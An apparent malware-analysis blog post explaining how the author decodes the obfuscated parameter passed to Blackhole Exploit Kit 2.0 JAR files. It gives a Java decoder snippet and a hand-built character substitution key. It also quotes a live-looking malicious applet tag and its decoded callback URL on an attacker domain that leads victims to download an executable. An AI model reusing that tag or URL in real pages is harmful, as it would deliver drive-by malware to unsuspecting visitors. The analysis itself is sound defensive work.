BHEK 2.0 Encoded Applet param cracked

The most common (possibly only) param value passed to BHEK 2.0 JAR files seems to follow a certain logic.  BHEK 2.0 JARs don't seem to decompile correctly in JAD or frontend plus and can be a great headache for those that want to find out the encoded param value.  Usually I just decompile the JAR and find the function that decodes the param like so;

Class CalloutApp
{
   CalloutApp()
    {
    }
   public static String Ur(String s)
    {
        String s1 = "";
        int i = s.length();
        for(int j = 3; j < i; j += 4)
            s1 = (new StringBuilder()).append(s1).append(s.substring(j, j + 1)).toString();

        return s1;
    }
    public static void main(String args[])
    {
        System.out.println(Ur("Place your param string here"));
    }
}

Where I can just change the function instructions under static string Ur to match what I find in the malicious JAR.  Compile and run in terminal and the output would give me the callback.  All that changed with BHEK 2.0

Nowadays BHEK 2.0 JARs don't decompile well.  So today I found as many samples a possible to make a comprehensive alphabet list.

When the obfuscated BHEK is loaded there is usually an applet as well.  For this example I'll use the applet from a recent Vericon Labs malware request I saw via a retweet form MalwareMustDie.

<applet archive="http://voxility-gaozari.net/links/entity_committee.php?ofsa=070337020a&gyim=3f39&yeapv=ofkxvcam&cturr=uriii" code="greateac"><param value='N0b0909041f31310e1740324332091e22051a17121a44323c3a35093143323a111931353a0932091e0c3817232332090935353c040b043d052c391c291c0808291c271c1a0244353908081c281c181c3e1c2908081c341c081c291c2b022c391c27022336392302321a3905' name='&#117;&#105;d' /></applet>

Notice the <param value=> field, that is the encoded value passed to the JAR file that will, if successful, lead your host to download an .exe in most cases. If we look closely at the value you might notice a pattern.

N 0b 09 09 04 1f 31 31
    h    t   t    p   :   /   /

(no idea what the "N" is used for)

So now we can simply begin to build an ABC list.  Unfortunately I had to do this manually due to the JAR issues.

The encoded param decodes to the following;

http://voxility-gaozari.net/links/entity_committee.php?gf=070337020a&re=330b0809073306030704&f=02&mj=m&ia=g

Below is the list. I may be missing other values also but I have been able to decode several encoded params using this key.

1 = 37
2 = 27
3 = 08
4 = 2b
5 = 42
6 = 34
7 = 29
8 = 18
9 = 3e
0 = 1c

= = 39
& = 02
? = 3d
_ = 0c
- = 22
. = 3c
/ = 31
: = 1f

a = 1a
b = 28
c = 38
d = 00
e = 35
f = 2c
g = 05
h = 0b
i = 32
j = 36
k = 11
l = 43
m = 23
n = 3a
o = 17
p = 04
q = 01
r = 44
s = 19
t = 09
u = 21
v = 0e
w = 0a
x = 40
y = 1e
z = 12